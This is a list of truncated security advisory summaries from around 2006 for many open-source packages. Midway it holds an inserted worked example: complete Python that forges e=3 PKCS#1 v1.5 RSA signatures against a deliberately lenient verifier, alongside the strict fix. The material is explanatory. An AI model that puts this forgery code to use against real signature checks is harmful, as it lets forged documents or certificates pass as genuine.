Asterisk: Multiple vulnerabilities
Background Asterisk is an open source implementation of a telephone private branch exchange (PBX). Description Asterisk contains buffer overflows in channels/chan_mgcp.c from the MGCP driver and in channels/chan_skinny.c from the Skinny channel driver for Cisco SCCP phones. It also dangerously handle...
Cheese Tracker: Buffer Overflow
Background Cheese Tracker is a Qt-based portable Impulse Tracker clone, a music tracker for the CT, IT, XM and S3M file formats. Description Luigi Auriemma reported that the XM loader of Cheese Tracker contains a buffer overflow vulnerability in the loaderXM::loadintrumentinternal function from...
OpenSSL: Multiple vulnerabilities
Background OpenSSL is a toolkit implementing the Secure Sockets Layer and Transport Layer Security protocols and a general-purpose cryptography library. Description Tavis Ormandy and Will Drewry, both of the Google Security Team, discovered that the SSL_get_shared_ciphers function contains a buffer...
ClamAV: Multiple Vulnerabilities
Background ClamAV is a GPL virus scanner. Description Damian Put and an anonymous researcher reported a potential heap-based buffer overflow vulnerability in rebuildpe.c responsible for the rebuilding of an unpacked PE file, and a possible crash in chmunpack.c in the CHM unpacker. Impact By sendi...
Apache mod_tcl: Format string vulnerability
Background Apache mod_tcl is a Tcl interpreting module for the Apache 2.x web server. Description Sparfell discovered format string errors in calls to the set_var function in tcl_cmds.c and tcl_core.c. Impact A remote attacker could exploit the vulnerability to execute arbitrary code with the rights ...
libmusicbrainz: Multiple buffer overflows
Background libmusicbrainz is a client library used to access MusicBrainz music meta data. Description Luigi Auriemma reported a possible buffer overflow in the MBHttp::Download function of lib/http.cpp as well as several possible buffer overflows in lib/rdfparse.c. Impact A remote attacker could ...
Cscope: Multiple buffer overflows
Background Cscope is a developer's tool for browsing source code. Description Unchecked use of strcpy and scanf leads to several buffer overflows. Impact A user could be enticed to open a carefully crafted file which would allow the attacker to execute arbitrary code with the permissions of the...
Mozilla Network Security Service (NSS): RSA signature forgery
Background The Mozilla Network Security Service is a library implementing security features like SSL v2/v3, TLS, PKCS #5, PKCS #7, PKCS #11, PKCS #12, S/MIME and X.509 certificates. Description Daniel Bleichenbacher discovered that it might be possible to forge signatures signed by RSA keys with th...
Python: Buffer Overflow
Background Python is an interpreted, interactive, object-oriented, cross-platform programming language. Description Benjamin C. Wiley Sittler discovered a buffer overflow in Python's "repr" function when handling UTF-32/UCS-4 encoded strings. Impact If a Python application processes...
CAPI4Hylafax fax receiver: Execution of arbitrary code
Background CAPI4Hylafax makes it possible to send and receive faxes via CAPI and AVM Fritz!Cards. Description Lionel Elie Mamane discovered an error in c2faxrecv, which doesn't properly sanitize TSI strings when handling incoming calls. Impact A remote attacker can send null \0 and shell...
Seamonkey: Multiple vulnerabilities
Background The SeaMonkey project is a community effort to deliver production-quality releases of code derived from the application formerly known as 'Mozilla Application Suite'. Description A number of vulnerabilities have been found and fixed in Seamonkey. For details please consult the referenc...
ncompress: Buffer Underflow
Background ncompress is a suite of utilities to create and extract Lempel-Ziv-Welch (LZW) compressed archives. Description Tavis Ormandy of the Google Security Team discovered a static buffer underflow in ncompress. Impact An attacker could create a specially crafted LZW archive that, when...
Mozilla Thunderbird: Multiple vulnerabilities
Background The Mozilla Thunderbird mail client is a redesign of the Mozilla Mail component. Description A number of vulnerabilities have been found and fixed in Mozilla Thunderbird. For details please consult the references below. Impact The most severe vulnerabilities might lead to the execution...
Adobe Flash Player: Arbitrary code execution
Background The Adobe Flash Player is a renderer for Flash files - commonly used to provide interactive websites, digital experiences and mobile content. Description The Adobe Flash Player contains multiple unspecified vulnerabilities. Impact An attacker could entice a user to view a malicious Fla...
Opera: RSA signature forgery
Background Opera is a multi-platform web browser. Description Opera makes use of OpenSSL, which fails to correctly verify PKCS #1 v1.5 RSA signatures signed by a key with exponent 3. Some CAs in Opera's list of trusted signers are using root certificates with exponent 3. Impact An attacker could...
DokuWiki: Shell command injection and Denial of service
Background DokuWiki is a wiki targeted at developer teams, workgroups and small companies. It does not use a database backend. Description Input validation flaws have been discovered in the image handling of fetch.php if ImageMagick is used, which is not the default method. Impact A remote attack...
Mozilla Firefox: Multiple vulnerabilities
Background Mozilla Firefox is a redesign of the Mozilla Navigator component. The goal is to produce a cross-platform, stand-alone browser application. Description A number of vulnerabilities were found and fixed in Mozilla Firefox. For details please consult the references below. Impact The most...
OpenSSH: Denial of service
Background OpenSSH is a free suite of applications for the SSH protocol, developed and maintained by the OpenBSD project. Description Tavis Ormandy of the Google Security Team discovered a Denial of Service vulnerability in the SSH protocol version 1 CRC compensation attack detector. Impact A...
Tikiwiki: Arbitrary command execution
Background Tikiwiki is a web-based groupware and content management system, developed with PHP, ADOdb and Smarty. Description A vulnerability in jhot.php allows for an unrestricted file upload to the img/wiki/ directory. Additionally, an XSS exists in the highlight parameter of...
ImageMagick: Multiple Vulnerabilities
Background ImageMagick is a free software suite to manipulate, convert, and create many image formats. Description Tavis Ormandy of the Google Security Team discovered a stack and heap buffer overflow in the GIMP XCF Image decoder and multiple heap and integer overflows in the SUN bitmap decoder...
GnuTLS: RSA Signature Forgery
Background GnuTLS is an implementation of SSL 3.0 and TLS 1.0. Description verify.c fails to properly handle excess data in digestAlgorithm.parameters field while generating a hash when using an RSA key with exponent 3. RSA keys that use exponent 3 are commonplace. Impact Remote attackers could...
gzip: Multiple vulnerabilities
Background gzip, the GNU zip compression utility, is a free and patent unencumbered replacement for the standard compress utility. Description Tavis Ormandy of the Google Security Team has reported multiple vulnerabilities in gzip. A stack buffer modification vulnerability was discovered in the L...
Mailman: Multiple vulnerabilities
Background Mailman is a Python based mailing list server with an extensive web interface. Description Mailman fails to properly handle standards-breaking RFC 2231 formatted headers. Furthermore, Moritz Naumann discovered several XSS vulnerabilities and a log file injection. Impact An attacker cou...
BIND: Denial of service
Background ISC BIND is the Internet Systems Consortium implementation of the Domain Name System (DNS) protocol. Description Queries for SIG records will cause an assertion error if more than one SIG RRset is returned. Additionally, an INSIST failure can be triggered by sending multiple recursive...
DokuWiki: Arbitrary command execution
Background DokuWiki is a wiki targeted at developer teams, workgroups and small companies. It does not use a database backend. Description "rgod" discovered that DokuWiki doesn't sanitize the X-FORWARDED-FOR HTTP header, allowing the injection of arbitrary contents - such as PHP commands - into a...
LibXfont, monolithic X.org: Multiple integer overflows
Background libXfont is the X.Org Xfont library, some parts are based on the FreeType code base. Description Several integer overflows have been found in the CID font parser. Impact A remote attacker could exploit this vulnerability by enticing a user to load a malicious font file resulting in the...
FFmpeg: Buffer overflows
Background FFmpeg is a very fast video and audio converter. Description FFmpeg contains buffer overflows in the AVI processing code. Impact An attacker could trigger the buffer overflows by enticing a user to load a specially crafted AVI file in an application using the FFmpeg library. This might...
xine-lib: Buffer overflows
Background xine is a high performance, portable and reusable multimedia playback engine. xine-lib is xine's core engine. Description xine-lib contains buffer overflows in the processing of AVI files. Additionally, xine-lib is vulnerable to a buffer overflow in the HTTP plugin xineplug_inp_http.so via a...
AdPlug: Multiple vulnerabilities
Background AdPlug is a free, cross-platform, and hardware-independent AdLib sound player library. Description AdPlug is vulnerable to buffer and heap overflows when processing the following types of files: CFF, MTK, DMO, U6M, DTM, and S3M. Impact By enticing a user to load a specially crafted fil...
OpenSSL, AMD64 x86 emulation base libraries: RSA signature forgery
Background OpenSSL is a toolkit implementing the Secure Sockets Layer and Transport Layer Security protocols and a general-purpose cryptography library. The x86 emulation base libraries for AMD64 contain a vulnerable version of OpenSSL. Description Daniel Bleichenbacher discovered that it might be...
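The four RSA signature forgery entries above (NSS, Opera/OpenSSL, GnuTLS, OpenSSL on AMD64) all describe the same 2006 bug class: a PKCS #1 v1.5 verifier that parses the padding and hash but does not insist that nothing follows them, so with a public exponent of 3 an attacker can forge a signature by taking an integer cube root. The block below is an added worked example and is not code from any of the advisories or projects listed; the RSA key, the messages and the "lenient" verifier are constructed here to model the bug (the OpenSSL/NSS variant ignored trailing bytes after the hash; the GnuTLS variant ignored excess bytes inside digestAlgorithm.parameters, with the same effect). The forgery uses only the public modulus, and the example also shows that a 1024-bit modulus with SHA-256 is too small for this basic variant to fit.

```python
"""Bleichenbacher-style forgery of PKCS#1 v1.5 RSA signatures under e=3.
Added example; key, messages and the lenient verifier are constructed."""
import hashlib
import secrets

# DER DigestInfo prefix for SHA-256 (RFC 8017, section 9.2, note 1).
SHA256_PREFIX = bytes.fromhex("3031300d060960864801650304020105000420")


def _is_probable_prime(n, rounds=16):
    """Miller-Rabin with random bases; adequate for a demo key."""
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37):
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):
        x = pow(secrets.randbelow(n - 3) + 2, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def _random_prime(bits):
    """Prime with p % 3 == 2, so that 3 is invertible mod p-1 (e=3 is usable)."""
    while True:
        p = secrets.randbits(bits) | (1 << (bits - 1)) | 1
        if p % 3 == 2 and _is_probable_prime(p):
            return p


def generate_e3_key(bits=2048):
    """Return (n, d) for a constructed RSA key with public exponent 3."""
    p, q = _random_prime(bits // 2), _random_prime(bits // 2)
    return p * q, pow(3, -1, (p - 1) * (q - 1))


def _digest_info(msg):
    return SHA256_PREFIX + hashlib.sha256(msg).digest()


def _emsa_encode(msg, k):
    """EMSA-PKCS1-v1_5: 00 01 FF..FF 00 || DigestInfo, exactly k bytes."""
    t = _digest_info(msg)
    return b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t


def _k(n):
    return (n.bit_length() + 7) // 8


def sign(msg, n, d):
    return pow(int.from_bytes(_emsa_encode(msg, _k(n)), "big"), d, n)


def verify_strict(msg, sig, n):
    """RFC 8017 8.2.2: rebuild the whole encoded message and compare all of it."""
    k = _k(n)
    return pow(sig, 3, n).to_bytes(k, "big") == _emsa_encode(msg, k)


def verify_lenient(msg, sig, n):
    """Parse-and-walk verifier that never checks what follows the hash (the bug)."""
    k = _k(n)
    em = pow(sig, 3, n).to_bytes(k, "big")
    if em[:2] != b"\x00\x01":
        return False
    i = 2
    while i < k and em[i] == 0xFF:
        i += 1
    if i < 10 or i >= k or em[i] != 0x00:  # demand at least 8 padding bytes
        return False
    return em[i + 1:].startswith(_digest_info(msg))  # trailing bytes ignored


def _icbrt(x):
    """Floor of the integer cube root (Newton iteration from above)."""
    if x < 2:
        return x
    r = 1 << ((x.bit_length() + 2) // 3)
    while True:
        r2 = (2 * r + x // (r * r)) // 3
        if r2 >= r:
            return r
        r = r2


def forge(msg, n):
    """Public-key-only forgery: find s with s**3 == prefix || arbitrary tail."""
    k = _k(n)
    prefix = b"\x00\x01" + b"\xff" * 8 + b"\x00" + _digest_info(msg)
    tail_bits = 8 * (k - len(prefix))
    low = int.from_bytes(prefix, "big") << tail_bits  # prefix, then zero bytes
    s = _icbrt(low)
    if s ** 3 < low:
        s += 1  # ceil(cbrt(low)); s**3 - low < 3*s**2 + 3*s + 1
    if s ** 3 >> tail_bits != int.from_bytes(prefix, "big") or s ** 3 >= n:
        raise ValueError("modulus too small: cube-root error overruns the tail")
    return s  # s**3 < n, so no modular reduction ever disturbs the prefix


def demo(bits=2048):
    """Constructed end-to-end run; returns the four verifier verdicts."""
    n, d = generate_e3_key(bits)
    genuine, bogus = b"pay 10 EUR to 42", b"pay 10000 EUR to 1337"  # constructed
    real, fake = sign(genuine, n, d), forge(bogus, n)
    return (verify_strict(genuine, real, n), verify_lenient(genuine, real, n),
            verify_strict(bogus, fake, n), verify_lenient(bogus, fake, n))
```

`demo()` returns `(True, True, False, True)`: the strict verifier accepts only the genuine signature, while the lenient one also accepts the forged signature on a message the key holder never signed. The fix that shipped in 2006 is the `verify_strict` shape: re-encode the expected block and compare the entire thing, rather than walking the padding and stopping at the hash.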
GTetrinet: Remote code execution
Background GTetrinet is a networked Tetris clone for GNOME 2. Description Michael Gehring has found that GTetrinet fails to properly handle array indexes. Impact An attacker can potentially execute arbitrary code by sending a negative number of players to the server. Workaround There is no known...
OpenTTD: Remote Denial of service
Background OpenTTD is a clone of Transport Tycoon Deluxe. Description OpenTTD is vulnerable to a Denial of Service attack due to a flaw in the manner the game server handles errors in command packets. Impact An authenticated attacker can cause a Denial of Service by sending an invalid error numbe...
Streamripper: Multiple remote buffer overflows
Background Streamripper extracts and records individual MP3 file tracks from SHOUTcast streams. Description Ulf Harnhammar, from the Debian Security Audit Project, has found that Streamripper is vulnerable to multiple stack based buffer overflows caused by improper bounds checking when processing...
LibXfont: Multiple integer overflows
Background libXfont is the X.Org Xfont library, some parts are based on the FreeType code base. Description Several integer overflows have been found in the PCF font parser. Impact A local attacker could possibly execute arbitrary code or crash the X server by enticing a user to load a specially...
PHP: Arbitrary code execution
Background PHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML. Description The sscanf PHP function contains an array boundary error that can be exploited to dereference a null pointer. This can possibly allow the...
Wireshark: Multiple vulnerabilities
Background Wireshark is a feature-rich network protocol analyzer. Description The following vulnerabilities have been discovered in Wireshark. Firstly, if the IPsec ESP parser is used it is susceptible to off-by-one errors; this parser is disabled by default. Secondly, the SCSI dissector is...
Motor: Execution of arbitrary code
Background Motor is a text mode based programming environment for Linux, with a syntax highlighting feature, project manager, makefile generator, gcc and gdb front-end, and CVS integration. Description In November 2005, Zone-H Research reported a boundary error in the ktools library in the...
X.org and some X.org libraries: Local privilege escalations
Background X.org is an implementation of the X Window System. Description Several X.org libraries and X.org itself call setuid-family functions without checking their return value. Impact Local users could deliberately exceed their assigned resource limits and elevate their privileges afte...
AlsaPlayer: Multiple buffer overflows
Background AlsaPlayer is a heavily multithreaded PCM player that tries to utilize ALSA utilities and drivers. As of June 2004, the project is inactive. Description AlsaPlayer contains three buffer overflows: in the function that handles the HTTP connections, the GTK interface, and the CDDB queryi...
Heartbeat: Denial of service
Background Heartbeat is a component of the High-Availability Linux project. It is used to perform death-of-node detection, communications and cluster management. Description Yan Rong Ge discovered that the peel_netstring function in cl_netstring.c does not validate the "length" parameter of user...
fbida: Arbitrary command execution
Background fbida is a collection of image viewers and editors for the framebuffer console and X11. fbgs is a PostScript and PDF viewer for the linux framebuffer console. Description Toth Andras has discovered a typographic mistake in the "fbgs" script, shipped with fbida if the "fbcon" and "pdf"...
Heimdal: Multiple local privilege escalation vulnerabilities
Background Heimdal is a free implementation of Kerberos 5. Description The ftpd and rcp applications provided by Heimdal fail to check the return value of calls to seteuid. Impact A local attacker could exploit this vulnerability to execute arbitrary code with elevated privileges. Workaround Ther...
Ruby on Rails: Several vulnerabilities
Background Ruby on Rails is an open-source web framework. Description The Ruby on Rails developers have corrected some weaknesses in actioncontroller/ related to the handling of user input and the LOAD_PATH variable. A remote attacker could inject arbitrary entries into the LOAD_PATH variable...
Net::Server: Format string vulnerability
Background Net::Server is an extensible, generic Perl server engine. It is used by several Perl applications like Postgrey. Description The log function of Net::Server does not handle format string specifiers properly before they are sent to syslog. Impact By sending a specially crafted datastrea...
WordPress: Privilege escalation
Background WordPress is a PHP and MySQL based multiuser blogging system. Description The WordPress developers have confirmed a vulnerability in capability checking for plugins. Impact By exploiting a flaw, a user can circumvent WordPress access restrictions when using plugins. The actual impact...
libwmf: Buffer overflow vulnerability
Background libwmf is a library for reading and converting vector images in Microsoft's native Windows Metafile Format (WMF). Description infamous41md discovered that libwmf fails to do proper bounds checking on the MaxRecordSize variable in the WMF file header. This could lead to a heap-based buff...
Warzone 2100 Resurrection: Multiple buffer overflows
Background Warzone 2100 Resurrection is a real-time strategy game, developed by Pumpkin Studios and published by Eidos Interactive. Description Luigi Auriemma discovered two buffer overflow vulnerabilities in Warzone 2100 Resurrection. The recvTextMessage function of the Warzone 2100 Resurrection...
MIT Kerberos 5: Multiple local privilege escalation vulnerabilities
Background MIT Kerberos 5 is a suite of applications that implement the Kerberos network protocol. It is designed to provide strong authentication for client/server applications by using secret-key cryptography. Description Unchecked calls to setuid in krshd and v4rcp, as well as unchecked calls ...
DUMB: Heap buffer overflow
Background DUMB (Dynamic Universal Music Bibliotheque) is an IT, XM, S3M and MOD player library. Description Luigi Auriemma found a heap-based buffer overflow in the it_read_envelope function which reads the envelope values for volume, pan and pitch of the instruments referenced in a ".it" Impulse...
ClamAV: Heap buffer overflow
Background ClamAV is a GPL virus scanner. Description Damian Put has discovered a boundary error in the pefromupx function used by the UPX extraction module, which unpacks PE Windows executable files. Both the "clamscan" command-line utility and the "clamd" daemon are affected. Impact By sending ...